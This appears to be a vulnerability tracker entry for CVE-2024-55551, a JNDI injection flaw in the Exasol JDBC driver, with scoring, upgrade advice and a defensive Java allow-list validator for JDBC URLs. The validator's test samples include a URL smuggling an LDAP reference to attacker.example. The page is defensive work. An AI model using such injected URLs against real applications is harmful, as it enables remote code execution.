Cyber Posture

CVE-2024-55551

Severity: High
Published: 19 March 2025
Modified: 26 September 2025
KEV Added: (no date listed)
CVSS Score: 8.3 (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)
EPSS Score: 0.0317 (87.0th percentile)
Risk Priority: 19 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Description

An attacker who can inject parameters into the JDBC URL consumed by a vulnerable Exasol JDBC driver (versions before 24.2.1) can trigger a JNDI lookup while the driver connects to the database, which can lead to remote code execution in the connecting Java application.

Security Summary

CVE-2024-55551 affects the Exasol JDBC driver in versions prior to 24.2.1; the fixed release shipped on 2024-12-10. An attacker who can influence the JDBC URL handed to the driver can inject parameters that cause the driver to perform a JNDI lookup while it establishes the database connection. Because a JNDI lookup against an attacker-controlled name (typically an LDAP or RMI reference) can return objects that the Java runtime instantiates or deserializes, the flaw can lead to remote code execution. It is classified as CWE-471 and carries a CVSS v3.1 base score of 8.3 (AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).

Exploitation targets users or applications that pass untrusted JDBC URLs to the vulnerable driver. The attack is delivered over the network (AV:N), is rated high complexity (AC:H), needs no privileges on the target (PR:N) and requires user interaction (UI:R), typically tricking a victim into supplying or using a malicious URL in a Java application that connects to Exasol. A successful JNDI injection executes code with the privileges of the application process; the scope change (S:C) reflects that the impact extends beyond the driver to that process and whatever it can reach, with high impact on confidentiality, integrity and availability.

Exasol fixed the issue in JDBC driver version 24.2.1, as documented in the official release notes. Administrators should upgrade to 24.2.1 or later and review how connection strings are built: a JDBC URL should be treated as untrusted input wherever any part of it can come from a user, a request or an unverified configuration source, and its host and connection properties should be checked against an allow-list before the string reaches DriverManager.getConnection(). Current JDK defaults (com.sun.jndi.ldap.object.trustURLCodebase=false since 8u191 and 11.0.1) block remote class loading through LDAP references, but JNDI injection can still reach deserialization gadgets already on the application's classpath, so the JDK default is not a substitute for the driver update. Additional technical details, including a proof-of-concept, appear in a GitHub gist, with related context in a Black Hat Europe 2024 briefing on Java Authentication and Authorization Service (JAAS) attack surfaces.
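As an added example (not Exasol's code and not taken from the referenced gist), the following Java check applies the allow-list approach described above to an Exasol JDBC URL before the string is handed to DriverManager.getConnection(). It assumes the URL shape the driver documents, jdbc:exa:<host>:<port>[;<prop>=<value>]..., and the allowed hosts, allowed property names and sample URLs are illustrative assumptions, not values from the advisory. The property set is deliberately an allow-list: the advisory does not say which parameter triggers the lookup in the old driver, and an allow-list rejects an unknown parameter whatever its name.

```java
import java.util.LinkedHashMap;
import java.util.Locale;
import java.util.Map;
import java.util.Set;
import java.util.regex.Pattern;

/**
 * Allow-list validator for Exasol JDBC URLs that come from an untrusted
 * source. Example code for this page, not part of the Exasol driver.
 */
public final class ExasolJdbcUrlGuard {

    private static final String PREFIX = "jdbc:exa:";

    // Assumed: the only database hosts this application is meant to reach.
    // Exact matches only, so Exasol's host-range syntax (a..b) is rejected.
    private static final Set<String> ALLOWED_HOSTS =
            Set.of("exasol-prod.internal", "10.0.4.21");

    // Assumed: the connection properties this application actually uses.
    // Anything else is rejected, so a property that makes an old driver
    // perform a JNDI lookup never reaches it, regardless of its name.
    private static final Set<String> ALLOWED_PROPS =
            Set.of("schema", "encryption", "clientname", "fetchsize", "querytimeout");

    // Conservative value syntax: no ':' or '/', so no ldap:// or rmi:// URIs.
    private static final Pattern SAFE_VALUE = Pattern.compile("[A-Za-z0-9_.-]{1,64}");

    public static final class RejectedUrlException extends Exception {
        public RejectedUrlException(String msg) { super(msg); }
    }

    private ExasolJdbcUrlGuard() {}

    /**
     * Validates the URL and returns its properties. Throws on anything outside
     * the allow-list. On success the caller may pass the exact same string to
     * DriverManager.getConnection(); its whole character set is constrained here,
     * which leaves little room for a parsing differential with the driver.
     */
    public static Map<String, String> validate(String url) throws RejectedUrlException {
        if (url == null || !url.startsWith(PREFIX)) {
            throw new RejectedUrlException("not an Exasol JDBC URL");
        }
        // -1 keeps empty trailing segments so "...;" is rejected as malformed.
        String[] parts = url.substring(PREFIX.length()).split(";", -1);
        String[] hostPort = parts[0].split(":", -1);
        if (hostPort.length != 2) {
            throw new RejectedUrlException("expected host:port, got '" + parts[0] + "'");
        }
        if (!ALLOWED_HOSTS.contains(hostPort[0])) {
            throw new RejectedUrlException("host not in allow-list: " + hostPort[0]);
        }
        int port;
        try {
            port = Integer.parseInt(hostPort[1]);
        } catch (NumberFormatException e) {
            throw new RejectedUrlException("port is not numeric: " + hostPort[1]);
        }
        if (port < 1 || port > 65535) {
            throw new RejectedUrlException("port out of range: " + port);
        }
        Map<String, String> props = new LinkedHashMap<>();
        for (int i = 1; i < parts.length; i++) {
            int eq = parts[i].indexOf('=');
            if (eq <= 0 || eq == parts[i].length() - 1) {
                throw new RejectedUrlException("malformed property: '" + parts[i] + "'");
            }
            String key = parts[i].substring(0, eq).toLowerCase(Locale.ROOT);
            String value = parts[i].substring(eq + 1);
            if (!ALLOWED_PROPS.contains(key)) {
                throw new RejectedUrlException("property not in allow-list: " + key);
            }
            if (!SAFE_VALUE.matcher(value).matches()) {
                throw new RejectedUrlException("unsafe value for property " + key);
            }
            if (props.put(key, value) != null) {
                throw new RejectedUrlException("duplicate property: " + key);
            }
        }
        return props;
    }

    public static void main(String[] args) {
        // Constructed sample URLs: one benign, one smuggling an LDAP reference
        // in an unknown property, one pointing at a host outside the allow-list.
        String[] samples = {
            "jdbc:exa:10.0.4.21:8563;schema=SYS;encryption=1",
            "jdbc:exa:10.0.4.21:8563;schema=SYS;debug=ldap://attacker.example:1389/Exploit",
            "jdbc:exa:attacker.example:8563;schema=SYS",
        };
        for (String s : samples) {
            try {
                System.out.println("ACCEPT " + s + " -> " + validate(s));
            } catch (RejectedUrlException e) {
                System.out.println("REJECT " + s + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

The check sits in the application, not the driver, so it is defense in depth alongside the 24.2.1 upgrade rather than a replacement for it. Validating and then passing the identical string matters: re-assembling a URL from the parsed pieces would reintroduce the very parsing step the check is meant to constrain.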

Details

CWE(s)
CWE-471

Affected Products

exasol
jdbc driver
< 24.2.1 (fixed in 24.2.1)

MITRE ATT&CK Enterprise Techniques

T1203 Exploitation for Client Execution (tactic: Execution)
Adversaries may exploit software vulnerabilities in client applications to execute code.
Why these techniques?

The vulnerability in the Exasol JDBC driver enables JNDI injection through a malicious JDBC URL, leading to remote code execution in the process of the Java client application that uses the driver. That maps directly to exploitation of a client application for code execution.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0
